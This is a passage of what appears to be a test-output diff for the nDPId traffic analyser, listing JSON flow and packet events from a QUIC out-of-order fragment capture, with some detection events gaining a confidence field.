oqL11AGEcZlyCkzwplqlHqv3BulzvKXdH9fy+hypwspz5JB3rBva7abdmpAfrNWtysCkoMbDEsi+BH9Sw\/WfI\/JW43OziRxWE0b\/6GaLLm0LPRqG0ta2a+8bSNrTX8mMiYpr81yyeAJGf+3SLq39ywLsaDDH+SnGlydZPTKaT5dEVTmOUfwB8TyliRH7r2g\/e8Jo89ZNHbaMlGDbYtZHnJ\/oXmkMMX0TtfMqSbUAI13SGw0x0yqJUBVeqWXi6nCYIEoougf\/rRSL7RNh\/DgbwKlBhtRbBjEQ\/fei4q7M4c5UJkO+skPmmiMvYCQhOGRb6M75LAcuzVGQ8XTpzS4Q49h3haLUT7LCYbVjfGyqoeek1PufbtNM7RA9oB6986rRvq1HME2Qh77x8xxPIkwZHbkxc\/bKYMzPnJ2UeHA+V+TItjasVAOkyFvBZpJobZJOx5lM+v4cwtiH2ykJPHJYMbL8uQhYq741WaUualB49TABJ2lncw6tGeQpg0Oc\/Ffn7jPYQNW8CiZh2MKru7wG5Af2I7ggRC0CDFHJi4CcaHMbjEL8xmaCoe7kEiBjZVMpQq8yq8HDVmX6xuiwGFbSpnmw7737hgdBgSQgsmzZ+eyRAnkDX7sSqv9hCS0Zcb3DoP4XMm+5jI\/u\/CnNPitv0yoNrGp5yiS0Bb3cyT9aVQMRpm5+oM6J8FgVTuiAzbLFQfG28vM2HH6RzkRHWgAdyYhr1dpw2Zy7iTAPNVWd1SULG1vIgBDQMenfFa7JoTVJsPivxw59Fc6nxyGVmp7UaHrhQVYqlLcKnPC62iMBiWrPAYZFn5ijxczxoNDc6ynoTmgTnNCK4rH5wD4cRLasJRPJwZqqD20+m0sIXMeyDt2b+cU4j\/UFP20j2zVAVzNgz5C8yIdFJDfygcCX1uMo4LGqi5N+2qh3+XEDAJQkfWgO2sWhpJa\/W6mNUejnWaDgkXgNbiL8BtuKDTdIalY78bJmkO8h2Cl7UuEPHZbPJY1CNBXdiCdtfcR\/\/69FKUtxyHLd44Txaub7ezT8XT\/2j1TO5ZpJK2c9CQslposHRZIXcQpmszsY7beFygv4KRpcCyDhjXHdoMk4Cx6Zf322ZH0visL\/1\/gL4MdUJwQBy3KCD2JhsiDqFkE3JPopsXvIIsTgN2itT8qn30ZnTFxpcPjawKM8R8YmcFcSfJXzy9S4n3fG5zVGgQhv+APAzodhVQyyG6paPspPsNKi3e6pZse6mfJbU+RHKTdtZrGwzhUbQsLxNpwTzdCArEwHBFERYdg28g2amHvk3VyhEJlMpWUR4CasyIc0tQUYMkJaCUUlS0aWSy5Tnhj9mf3ScVUNZtHYvoFQgMdxMVZR0ICCfvHTrO6AtY5\/AI2NI8kYvvIj5Qw+wIOEUvx1PjAGLWbH4JzLOrTxTHK"}
-00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621434024831,"flow_last_seen":1621434024831,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621434024831,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"185.186.183.185","src_port":60949,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00692{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621434024831,"flow_last_seen":1621434024831,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621434024831,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"185.186.183.185","src_port":60949,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00627{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":73,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433861442,"flow_last_seen":1621433861442,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621434304066,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"217.254.108.174","src_port":57565,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00627{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":73,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621434024831,"flow_last_seen":1621434024831,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621434304066,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"185.186.183.185","src_port":60949,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00625{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":73,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433861875,"flow_last_seen":1621433861875,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621434304066,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"143.52.137.18","src_port":52387,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00627{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":73,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433949433,"flow_last_seen":1621433949433,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621434304066,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":49860,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00624{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621434304066,"flow_last_seen":1621434304066,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621434304066,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"137.238.249.2","src_port":57735,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02305{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1621434304066,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621434304066,"pkt":"AAAAAAAAAAEA4PSECABFAAViGypAAH4RcNqokEAFie75AuGHAbsFTmxnxP8AAB0I6APGIi8XMbMANwAf+\/1CDYfNSqZV6JuY2eU0m84t1CHbeC6cE\/+erbLQOHtC\/LsGzIyDeeVGEgpwCWPVi+MQCnZE\/Ygc2mi4SLeix+8TnlYUcEJa7kzg6S+7lKmfSMXvMlPqpt8Jqhul99eiai\/CwIIhzgiuj7qKQafo1JRj2kBZbTRDU1+SZHOQN7e5Nj19ARXzRQ1f1x+ihAp61tvIBTDRPDLXc1ubHgvyinj5MfnF\/12s5SMxBHDDCXN3NmqXQxAS4MECv72MUs94PMpz9zGUL5LHUzGHAIbclxnzN7sHd1go4+lLCWey570KhMF8PzFiMw5ory1Vew4LX22LtMy2jvvM1vnDE1crnUnJCzQDcgJHDiRsasjBdtp7HdISribAOc8CB2obB0oyyA5X8m4qhy5s84s74KgzXgyxL59PIeQSEcVb59yBdZjMcyXXJ80CrHVTLXNi4PQyHnn48osYeAyUn8yU3VqEWwgftLAi39oJlXsQyCTXsKmuL7OB7gY7Vuai77q03lFhqfHaX9cLtEypQIWNB2r\/l2ALpr13EuKe2oyXGUuf78i9rQmSYgbO4A4y3MRD\/QqZXl\/77HpSb03kGClkTea21fqnpJT\/zJSYfPYFvCXBYWmiAW9wMzLsKUQeqeHCc1gL7imhRXQ4PrR2LeuOgoR5+fRtqAenht6XH9lUHNUo32hs\/wjLrrHX9gnX1hALWGhcNyMLvpFTjI5tPVKkRbNv5c3mJilmNWHxhjVHpnhQDdE3xh\/NfcCROvsyq5m28OWLWcPE2FvU5KBMY6t0tV0A4eoef29jjCAjLO\/M8mpZb7ujaK\/6H5Re8VFYbLmxdrQraYtMIxWND\/984VqRyFoxBrQh6ygpK33dCrOTNkgS2NHt4BbEN3kBlcM\/dJxkQlX\/WhjdaU\/jKdtFt12Kk5gsUCyahX7xPzli0x1FX\/Q6DmOvGVlWQmKwwBBrReFKQe+WYt51ygXzik317+tRLkmZwIN6Nf5C1O+PyUMA7NiOjHZECt9SxgRFTLngwK\/BOvB+tJVNrOjrc5ouhUeeMBFLaijzDUDK1PsEMcF3KYI4t\/ROzLfqLIxLRK+vFjZLKp8b\/lca3pPTeuTvHMH9GjJ0X9j4ISArXi3WDjwMH\/Ow1fIn6CTlfV8aDmzMvW0v9ZGuQXxYq3FVxoJ6jyGNfEJzY+Tal8doePa4R1YqwbnqHBlxYcCHiNxYcJir\/3tIthYf6C7p1vYTQ0q9zzsSi9ab+onOdI4XXVybeJLwUU0vgi23+ITCo5zV6ESOFAjb+YSOsYgwePhG2z0W6PMf7nvnuMEzAy1AOgdBeakrjggSIvTuM3izkIHo3vfWd9R+DyKdj7JlM\/HRJmVAHwQIB+FHDGPxLbMFK9o+C4TYA4LeNTQ2YMqk6y7D+GRumXbZ\/9OD7PDPvEuiASsqlgc7rtO5TmRCZno3ukk8JNtthovwosB91+YQlqUUew2kq+cJr8mtfNeNdB4fYgAJJqJbMWJd6QOv52uYyuvINUeitOOi64uHklHkyRistUgemwXXe7otvzQLzpEQlEHAtTBMiKoZve\/eJFLoSA8M6gHeOxwAnJqUrU74jdXSt1xL+HU2Hynt8\/YtqB6Ky+qMw0VdxI8dMW6f6iKuz3JMrpbMCfeILC76cPYJAI0R1JC+ZQwx6QeScq+kiLVZZk4THRZ2H5yZznb9iTrWTpZBeU0\/nsuUhcsqOtw38xuyp6cqnniKTRwy7qgYC9\/RKw732DLUQ1HhQkZ5LproX0hXWsSSQ8AXfC29DpYL"}
-00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":73,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621434304066,"flow_last_seen":1621434304066,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621434304066,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"137.238.249.2","src_port":57735,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
+00690{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":73,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621434304066,"flow_last_seen":1621434304066,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621434304066,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"137.238.249.2","src_port":57735,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {}}
 00625{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":74,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621434304066,"flow_last_seen":1621434304066,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621486316206,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"137.238.249.2","src_port":57735,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00626{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621486316206,"flow_last_seen":1621486316206,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621486316206,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"208.229.157.81","src_port":50588,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02299{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1621486316206,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621486316206,"pkt":"AAAAAAAAAAQAJ0huCABFAAViZWtAAH4R2n40uxSv0OWdUcWcAbsFTrOSyf8AAB0I+xTa7lKQafkAAEU0jTWyhjWmo3c2c8tkYAeIRC00J2hfh\/j02rOWVtYboU9UivrOMDnb4DlblCS28uJrMkjjwdTtO22vVFwPaYxj2IIflFADqJCdVuHcXcnvIynZuH\/49aoZoAl2YJS8pUl6yCn3zcPhaVYM3BWJHJ12bT\/rBl+QUhFz+eNv1NjusSyo7XRmUXDT9LZCM\/KsdcUeJxbJMKMhLKDH81GMtpYCHwWUPWqqO9e9hvA+yFxWoDib4NbLv3\/NPWniDKh36sKuVx\/WIkOp5AaTQLzBliiDDxtF80Iy3ba1w3uKH81kscAY6jISZDkCGIpkH83a9jbwNNTu4dDGSDZa7\/6HH5W20Tq4MhhXWYZTT\/8h1Oy0puUFllXhqXmIg8+2Grn5B+DCtffivNTxawD23zhZYDMa5O4Knv1pxKsoCPI9uGjVARZ4WxoinnBJ4Lx\/eivjiy\/9wUiLC2t3yBsy7scxzTv7a9B56haRYFOHLBvLzNjV2ReQFucDRZ194sZlbUdGn8MFTzauGKyE8FjTABrbToSZZkd+s9mIdwH35yLr658ZiMm1iQSdaUX3AcvdyYuEGp8MnQAMvaoRfRnnmkSaFBBjiB2OIsBm5yjfjQzpYtX97hEeUwSv5yqk9ySGiUJXi\/5hLfad84l42JzVEw9YlxyakiWEDTCs6mdaMom7vY\/Iha1i3AZ8pf3WkhBJ3b2\/2DKVs0REkOZgjTqzdd\/K4AfSFcDL8A1CiF09bQ+eTVXaS+xpmL5GSTVDyTRM40KZfUhO\/T9EQZtNPiniyNqbtSZp2BYc+\/2l9wdhMEjiEKO6wYoSeRFPJBNsw+m7Su\/ssmDRlXGBnVI6tlHZWM7CBp7yEtJ+9b5lh\/h2b6o8NLXzXZmB94SFM5zpx3nqn4s+YimdYWtGhQxRDQoKolK3iglu1GOcgjHmAJkQjEjCoXuY5Z3wxhAtlHkChB4D4Sj+Mo0Pe8PuHQ3hvPSuLwFw0FqDm7Rspzd6alV6wevE9brqF0ttPmCgs8akAeLH3Hg2jOzJR7Zq8KSRDJyhC5wYRQJomZdHmhVl6k0hQlrOPsbeG33RJrOXASmtURkVNrkqMFtEbzD+nJJcxlWpn49Ehl9m2kKOIs1drmrTjCgOrpMNceU36z6U7NKS4u4a1hVFTMi1YV9BCf0SrTjGuouERb51jAiRXHvLt9eC3HlqplhkgSDMr8ATClK+9EeI5ZYJ+qwQ1oNpZdKQHsnK3rftNgPnZFIeVe2LSvMENi8FH6YjUWMcIEMIxUvHXWmhFLzwRkjM\/dETZG8LtSp9lIP+R6o2M+Z0pn4VC09fNocjGnGygpS8xtImvQ9Xi52Wji0Mxqp\/ox1cXlDhElkji1gScwsWqwExhfJEHyZrsxDoSgYL92Z1Pn4HBsnIkQM7VPxnWWnZFJ2LkCfQ6AL5v6LxfRd1eQDzaT8j2cXS+hAnjFgH8roiknWfHzSVGVNaIySwi6GzicPRwiTXqCSzzyJiRjY7LO2cY4SJmX6FqWWTL2hOvjoCvsVA2cZN1um+uHaF8+jCaYrlDihaV62byo0sQX49iEOMQc4cm5w+ac672idPEvZbXjaLZaKlnjbEhQJQMWC\/nDrqdHevi8VXVL66zosdlIzNI74mdhJfTd8oc2ovgBinEH9PA2Lqf8or\/1dRozLWj6+nG686ciLUDqT0aDB8JAQ3nq+eUFn83ml\/py\/lqV4T0XXeWonhVytFKd1udnPL0depml6Dv31txugFaXuB9swFjUHsdQbAqQI4U08c1YRaBctk"}
-00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":74,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621486316206,"flow_last_seen":1621486316206,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621486316206,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"208.229.157.81","src_port":50588,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"},"quic": {}}
+00700{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":74,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621486316206,"flow_last_seen":1621486316206,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621486316206,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"208.229.157.81","src_port":50588,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"},"quic": {}}
 02305{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":62,"flow_packet_id":2,"flow_last_seen":1621486316485,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621486316485,"pkt":"AAAAAAAAAAQAJ0huCABFAAViZXhAAH4R2nE0uxSv0OWdUcWcAbsFTqeoxf8AAB0I+xTa7lKQafkAAEU02NqFlwI2X\/88ClDrDdUJKCRw\/slmHtAOwvb06+QlMjRjV0hs2aYrH3dl2vG36AHZbKvCCu+8tbZyidkId\/SwRLk\/aGUb9L+x4bKEhyji10luTyL48ncebSgio1Ylf2sP5y7qYToItoOHdM+sF4EspTkGPS58+WD5u+L5sXHLzRq6EFovw7tEFm4rXT1ncWUZsfHN3bUzi7UC\/xILKAQ258ulh3E12ZSv8bupoSOwAKHtGPJmU5UDctMjcbxM4bIIF8Y3B8utqsAN8n4iNen\/hK6bsT+7MeKDyJk8GvgeIX4qPhGkfCyzy2ZSx5In0Gj9mMFlrQlbRzQtMTQJLS9XHGrBJjKt7Kwt4iHS3C2\/ll+JnHv3jFSbkwPkaj4L9zsoUsRbA4HR60OvfubceMHwPcwpOKS\/YhEEpiSIRwK1XH4b0OZUCFWXt2vsvHXiJx7CWD5E6BOBg+ZYetFelTfuQxNgfXROtoGuJ+3wQxi2DRGnFXCHGYLoAO8i4AAIvpgGgoqzjNM1BmQvfSO\/X4dZ8fc7Fo7vdxAVJZrJXT4m2TBKFrsawVChuoJH67VOmFJS1xgFWukI7zRJtsXhN7Czc+i9T8YtKZjInSr9AVxgs0c5d\/WCQetSMLQd\/JT5oa0sx8n2J7Z2NcU99xovxV2uKz4qjrx\/Y2k6ZoB9x3f0Yg6sfXGEGo2MQD\/7z+LWRPw2gSm3FEw8jwVDd9S8o7TTxjGKX94D5vYTcchFQTfbn2HfhKqR8F1OQIlO\/wsmxlHMHBvFUjUhJiIPWRLZt9vP+JJ4qKw7nADsc3kkxPCiHPpOD07HQF+XsbdLrhdRPVrhK5WXHFkyBU\/dGYYuv1WiPzMaGJvkyCOgbXcAH3Gb5PcTDyew+MRzHK03TijcWQ+ZOoouVFzsL9ai7HJq8AhiXpNhyx1MICcuUOAIBkQWFqamjY7zI2GJ\/c8jdNXGDAcYVSSmicj+n+x1og23m\/OzzTHzOLv1hr3DJu3hQFGpKefyvQXTCQ\/t38x1oKMoJcBam+ydIiQL\/qBv8Cn9WIgDhZCWjY0H1Zu8jJgS\/pZVcJ7m1gqv0WsKI2s926YbdUCbQTSDQMHYPrbnBQU2zGsddtUkHA8smR00xItuhuXFpHntBzWrCuuKLbpV6LTA5KLTpwJmEru6UaR8hWJdlNusN0FzSumL2gnW0wHATZvtmTr71efZIP5glV9Q2+vjbPwcPmHOjEAqqO8a9LEnQ9t0G7b4NxL6vNhgV9vEOYuD\/QGqwrXjwJs\/ispzj8Z6ANFL8uKgoOlsRFn5hpE\/fEX3ckmgeLqbknqG+NWj2t9zKylkyKmSKmy\/cxU0t1SSA8TuG2Qovkwr8Q5atDfcwDzjbYNh4vnD4EwH9iR13QsPu2AvJQjfH4r8xwFeP4P+BosOwdv7qI095S245vAYmXdL+TcX5rXjtvIGCma5M3p3OuUhnY0Sw5uOMqNm7nKPE8gz+Qsbb3VghujUa0NFn\/z6mc8MCrFJWDwY0gtXgCMv3nHx0GNtveZAICqjHZI7xwD\/RqR1lUZAfrPmAYo2kQrmshXTSHK1+8ZYJQvHmShCz6JQySscdlE647wVjnlBAZLUNr\/JBi7VMTdmpytCi6WzCx9AClMAzaYwBrTYGAmEVrVYJn1CaBDE26M0v0gm+S3JJIUIKMgBJtWD32fztac9Z5cAdjD4Hplc8RLAKlcnsRn\/BbxbFD\/d6tMg\/0CsxSInqyE8gbUz3lWbKWZ4OyOgUZwqm1QvYwlCMJMB6wEc+xPqoVbA"}
 02306{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":62,"flow_packet_id":3,"flow_last_seen":1621486317090,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621486317090,"pkt":"AAAAAAAAAAQAJ0huCABFAAViZXtAAH4R2m40uxSv0OWdUcWcAbsFTgb1xv8AAB0I+xTa7lKQafkAAEU0t4azdHP6WARXvgfhEqAKpp3NRuHRg86uDYx6EraWfkB\/keNDFP3812WLSUJscegRJDC6DlMfTKSYGWjNCpVN8MkKLUxcf64j8OSn7gJZrI\/Q\/gKqY6Z8WIW7yXuifcAcxkC+cmw4eAjlyzZBZvU8ggZVByRRED2WeesmX9AerV06QYER0EbcO9+qzWXQ6Y1556b95esXVXYKwgaT\/JKPANtVx8JfgN8Vh1WXykc2J\/44ZDFpxZFRkUgHxJ3usOwxmesQs2TSh30GqcsvOPy1uBZE3aVlHsrZmfwcenRdsFblzJPQcAyj4L\/6\/V7LtEzbpK98ZznFjKlQ\/CAc0XOreT7lRX11x9l8Nwo5wz1cQeBW03aSFui9mnb+3x1mHZOfYliDqBYAh9AjahgYUEMLGQiqpnnOD59nJV21MaJqJDM\/LJMSKyy9TxlVb0G\/G5WjXSDrmaBMSxIJiiiNThOK4NxEJznmEgpU9sC2Kzrji4qQ4sLSQ6G6Z0s\/K5gmRdAHVqFaA+OXNLXjAWZslcHRAYBCopAeso5rNrNCUMASsOo0cU4hy3GR22hGlLj3LBUy\/ywcQOfX7XYMmNZHdOfJKOwbfgqm7seEpATTHBOfsy1pkFj95HcOrlD13hBtaabu3RXQXmH3nvQQ0rAeKIQPng6Rz1ptjgs6q\/CsEIrQ831zGr9a68MXwQ51qstfBpiZJmHO5lQoTCcztT\/VSQm16LxdoNEA+tXVtDTHWzSIJ\/LsE7pROWa4ORaidOXgt5TuUpfp4UISCbasJi8sLhnJLPMM\/EMJ23P7ba+yNMO1yGyYgCP8y3iA4+Y0RCdbxKqNpblS1T9\/mwKgrVDaW0XfBdJ9ftVX8k4Asxj7aK\/grpVoo1x51mqqsIA\/eHwsOupYQnvyOKi6jHUZB2gug+9nv8P0lYzQYOI55nVygLmUPrt2mSQ2sxQZ3kNmobaJriv6tzeq4TnHl6oNqBTaUDSvgLoQFd9\/B93pzBto\/PWA85xxN7VZQOfd+DbFZ\/VBe73Qs+O+\/dsWYu8iQAMXiU4ipp9EIx\/uZoMUoWZj8rpSXDjEmLBbfMhJKI7th4AA0\/5pKTfK1Apef9X0Y5Kb2sWh24U\/M0c4i1SQdud1ypuHQGiudDhFPShSAhcPisWpjplWcdsEwxnBas4ojrBnnQjyHC2CNab1rcfTuqYLiJtZH+uFMNQqqo6\/rNfItXVpIQOkY7oH9NiquEBxGd5JMZV8xVdnW72qeBwOu707A4H9dx8aMxpNDFlsPT1CFtBo0+lBzmwd+U1J8RntLvUR++yoLGBfFoOFlBTxWd3EivQ+g4+hpsw6rhJx+o9KX12Wn+aCMzsyz2T+R275SnsosAVi6kZMH82nXvr3evy7oteFCprRiLgZZtTXZYQJnyvePz3+OCE1jJkDgtZz9lh5TRWEayVbmQ09oh0A2tO7l+b1MhJ9OOwh0tP+9C20L\/Rggyul58op2cZC7t0viwUloxNKFKHp6rLutsIgcRmAblAvmfE5evu8AKGMZAnbi\/qa50JLxEWg2ch014JrpjvQIgocJjdI4tVkdA1vAfzuTPMq6ZgpnlfebCtsmAjEOJvaC2jz2PpD3Da36F+9zqnKoYC4kArpMRPt1KxhhpnZuf4gUuyQNfw3N1IHRfKWJXJxGnUUH22LX3lkdvtG8ab43cqVRaBCEPVJUDvP1bY6E3TNNUkpsE2FLpbFaVjW8UTq4sTUXREoubs1+bmZBpV1b11ZgF\/sh+IuI5ZSadOQo47ZmlSoh\/ht"}
 00625{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":78,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621486369476,"flow_last_seen":1621486369476,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1621486369476,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"99.42.133.245","src_port":61089,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02297{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1621486369476,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1621486369476,"pkt":"AAAAAAAAAAQAxdZsCABFAAViaPxAAH4RXAU0uxSvYyqF9e6hAbsFTrhSxP8AAB0I+0NvIwjQu6UAAEU0azRBvw0HhuIl9\/xBjvifKak7sXpTLlmi+dbAR0gnHQ8yLpljofwXe+5I8+bjI6htbC0wktYLe9u1IbRrfn281Ygo9P+77SbfKFoWgOiNBP7DCcTYRMpm60boF\/tXFlu4RcDwIKHkE98LfcboNnZO6vgCOMNp2Oc0FW71MgnEMdGflqZG7oF457RNBS84xcpV6nGLNOdNKSMQqzQlO4jgRLIFlWEVMuZfPjKeCbFvi+9u443qZzhpp1RjViXLJQLM4O3xNtmwsrIybLL167f7g6DkkCHpv7D4g7Aegn0CUSGnhsDPpzH6vl+y+ZphsvLUKg8Up8DKE6OcuDZ2hrkBODY3w78BA6TwCijjXzbEkjwfOo6WXZ7anzvjy2rKeT